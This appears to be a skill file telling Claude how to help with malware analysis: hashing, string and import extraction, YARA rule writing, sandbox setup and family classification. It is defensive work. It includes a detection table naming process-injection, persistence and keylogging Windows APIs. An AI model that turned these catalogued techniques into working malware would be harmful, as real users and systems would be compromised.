🦠 Malware Analysis & Sandboxing

Overview

This skill enables Claude to assist with malware analysis workflows including static analysis, dynamic/behavioral analysis, YARA rule generation, sandbox environment setup, and malware classification. Claude can interpret analysis results, identify malware families, and generate detection signatures.

⚠️ WARNING: Always handle malware samples in isolated, controlled environments. Never execute suspicious files on production systems. Use dedicated VMs or sandboxes.

---

Prerequisites

Required

• Python 3.8+
• yara-python, pefile, hashlib

Optional

• YARA — Pattern matching for malware
• Cuckoo Sandbox / CAPE — Automated dynamic analysis
• Docker — Container-based isolation
• Volatility — Memory analysis
• VirusTotal API — Multi-engine scanning
• Ghidra — Binary reverse engineering

pip install yara-python pefile python-magic requests ssdeep

---

Core Capabilities

1. Static Malware Analysis

Analyze malware without execution:

When the user asks to analyze a malware sample:

1. Calculate cryptographic hashes (MD5, SHA-1, SHA-256, Imphash, SSDeep)
2. Identify file type and format (PE, ELF, script, document, etc.)
3. Calculate entropy to detect packing or encryption
4. Extract embedded strings (C2 URLs, IPs, registry keys, mutex names)
5. Analyze imports/exports for suspicious API calls
6. Identify packing/obfuscation (UPX, Themida, custom packers)
7. Extract embedded resources and overlays
8. Check for known malware signatures
9. Map suspicious APIs to MITRE ATT&CK techniques
10. Generate IOCs (hashes, strings, network indicators)

Suspicious API Categories:

Category	APIs
Process Injection	CreateRemoteThread, WriteProcessMemory, VirtualAllocEx, NtMapViewOfSection
Persistence	RegSetValueEx, CreateService, SchTasks, WinExec
Anti-Analysis	IsDebuggerPresent, CheckRemoteDebuggerPresent, GetTickCount, QueryPerformanceCounter
Network	InternetOpenUrl, HttpSendRequest, WSAStartup, connect, URLDownloadToFile
Crypto	CryptEncrypt, CryptDecrypt, CryptHashData, BCryptEncrypt
File Operations	CreateFileW, WriteFile, DeleteFileW, MoveFileW
Keylogging	SetWindowsHookEx, GetAsyncKeyState, GetKeyState

2. YARA Rule Generation

Create detection rules from samples:

When the user asks to create YARA rules:

1. Extract unique byte sequences from the sample
2. Identify distinctive strings and patterns
3. Select stable indicators unlikely to change between variants
4. Write YARA rules with proper metadata
5. Test rules against the sample and benign files for false positives
6. Optimize rules for performance (avoid expensive regex)
7. Add condition complexity scoring

YARA Rule Template:

rule MalwareFamily_Variant : tag1 tag2 {
    meta:
        author = "Analyst Name"
        description = "Detects [Malware Family] [Variant]"
        date = "2024-01-01"
        hash = "sha256_hash"
        reference = "https://example.com/report"
        tlp = "WHITE"

    strings:
        $s1 = "unique_string_1" ascii wide
        $s2 = { 4D 5A 90 00 03 00 00 00 }  // hex pattern
        $s3 = /regex_pattern/

    condition:
        uint16(0) == 0x5A4D and
        filesize < 5MB and
        2 of ($s*)
}

3. Dynamic/Behavioral Analysis

Guide sandbox-based analysis:

When the user asks for dynamic analysis:

1. Recommend appropriate sandbox environment
2. Configure monitoring (API hooks, network capture, filesystem monitoring)
3. Suggest detonation parameters (timeout, user simulation)
4. Analyze behavioral reports (process trees, file modifications, registry changes)
5. Map behaviors to MITRE ATT&CK techniques
6. Identify C2 communication patterns
7. Extract dropped files and secondary payloads
8. Correlate static and dynamic findings

4. Malware Classification & Family Identification

Classify unknown samples:

When the user asks to classify malware:

1. Compare hashes against known malware databases
2. Analyze behavioral patterns for family indicators
3. Check for known packer/crypter signatures
4. Compare string patterns with known families
5. Use function-level similarity (SSDeep, import hash)
6. Map to known threat actor campaigns
7. Assign confidence level to classification

5. Sandbox Environment Setup

Guide secure analysis environment creation:

When the user asks to set up a sandbox:

1. VM configuration (isolated network, snapshots, minimal OS)
2. Analysis tool installation checklist
3. Network monitoring setup (INetSim, FakeDNS)
4. Anti-anti-VM countermeasures
5. Automated analysis pipeline configuration
6. Data collection and evidence preservation

---

Usage Instructions

Example Prompts

> Perform static analysis on this suspicious PE file
> Generate YARA rules from these malware samples
> Set up a malware analysis sandbox with Docker
> What MITRE ATT&CK techniques does this malware use?
> Create a behavioral analysis report from this Cuckoo sandbox output
> Classify this sample — what malware family does it belong to?

---

Script Reference

static_analyzer.py

python scripts/static_analyzer.py --file malware.exe --output report.json
python scripts/static_analyzer.py --file sample.dll --hashes --strings --imports

yara_generator.py

python scripts/yara_generator.py --samples ./malware_samples/ --output rules.yar
python scripts/yara_generator.py --file single_sample.exe --rule-name "MyMalware" --output rule.yar

---

Integration Guide

Chaining with Other Skills

• ← Threat Hunting (06): Receive suspicious samples identified during hunts
• ← Incident Response (07): Analyze malware collected during IR engagements
• → Reverse Engineering (04): Deep-dive into complex samples
• → Blue Team Defense (15): Generate detection signatures from analysis
• → Threat Hunting (06): Feed IOCs back for environment-wide hunting

---

References

• YARA Documentation
• MITRE ATT&CK
• MalwareBazaar
• VirusTotal
• Practical Malware Analysis (Book)
• CAPE Sandbox